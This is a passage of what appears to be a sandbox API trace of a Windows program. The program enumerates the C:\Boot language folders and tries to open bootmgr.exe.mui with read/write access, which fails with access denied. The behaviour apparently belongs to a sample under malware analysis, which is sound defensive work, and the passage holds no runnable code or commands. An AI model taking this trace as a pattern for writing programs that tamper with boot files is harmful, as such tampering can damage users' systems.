Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.517] AreFileApisANSI () returned 1 [0083.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hr-HR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hr-HR", lpUsedDefaultChar=0x0) returned 14 [0083.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.517] AreFileApisANSI () returned 1 [0083.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hr-HR") returned 14 [0083.518] CreateFileW (lpFileName="C:\\Boot\\hr-HR" (normalized: "c:\\boot\\hr-hr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.518] GetLastError () returned 0x5 [0083.518] GetLastError () returned 0x5 [0083.518] SetLastError (dwErrCode=0x5) [0083.518] GetLastError () returned 0x5 [0083.518] SetLastError (dwErrCode=0x5) [0083.518] GetLastError () returned 0x5 [0083.518] SetLastError (dwErrCode=0x5) [0083.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.518] AreFileApisANSI () returned 1 [0083.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hr-HR") returned 14 [0083.518] CreateFileW (lpFileName="C:\\Boot\\hr-HR" (normalized: "c:\\boot\\hr-hr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.518] GetLastError () returned 0x5 [0083.518] GetLastError () returned 0x5 [0083.518] SetLastError (dwErrCode=0x5) [0083.518] GetLastError () returned 0x5 [0083.518] SetLastError (dwErrCode=0x5) [0083.518] GetLastError () returned 0x5 [0083.518] SetLastError (dwErrCode=0x5) [0083.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.519] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.519] FindFirstFileExW (in: lpFileName="C:\\Boot\\hr-HR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0083.519] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.519] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0083.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.520] AreFileApisANSI () returned 1 [0083.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.520] AreFileApisANSI () returned 1 [0083.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 30 [0083.521] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.521] GetFileType (hFile=0x42c) returned 0x1 [0083.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.521] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.521] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.521] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.521] CloseHandle (hObject=0x42c) returned 1 [0083.521] AreFileApisANSI () returned 1 [0083.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 30 [0083.522] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.522] GetLastError () returned 0x5 [0083.522] GetLastError () returned 0x5 [0083.522] SetLastError (dwErrCode=0x5) [0083.522] GetLastError () returned 0x5 [0083.522] SetLastError (dwErrCode=0x5) [0083.522] GetLastError () returned 0x5 [0083.522] SetLastError (dwErrCode=0x5) [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.522] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69218, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⭠\x01⺊Ā")) returned 0 [0083.522] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0083.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0083.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.523] AreFileApisANSI () returned 1 [0083.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hu-HU", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hu-HU", lpUsedDefaultChar=0x0) returned 14 [0083.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.523] AreFileApisANSI () returned 1 [0083.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0083.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hu-HU") returned 14 [0083.524] CreateFileW (lpFileName="C:\\Boot\\hu-HU" (normalized: "c:\\boot\\hu-hu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.524] GetLastError () returned 0x5 [0083.524] GetLastError () returned 0x5 [0083.524] SetLastError (dwErrCode=0x5) [0083.524] GetLastError () returned 0x5 [0083.524] SetLastError (dwErrCode=0x5) [0083.524] GetLastError () returned 0x5 [0083.524] SetLastError (dwErrCode=0x5) [0083.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.524] AreFileApisANSI () returned 1 [0083.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0083.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hu-HU") returned 14 [0083.524] CreateFileW (lpFileName="C:\\Boot\\hu-HU" (normalized: "c:\\boot\\hu-hu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.524] GetLastError () returned 0x5 [0083.524] GetLastError () returned 0x5 [0083.524] SetLastError (dwErrCode=0x5) [0083.524] GetLastError () returned 0x5 [0083.524] SetLastError (dwErrCode=0x5) [0083.524] GetLastError () returned 0x5 [0083.524] SetLastError (dwErrCode=0x5) [0083.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.525] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.525] FindFirstFileExW (in: lpFileName="C:\\Boot\\hu-HU\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78350 [0083.525] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.525] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.525] 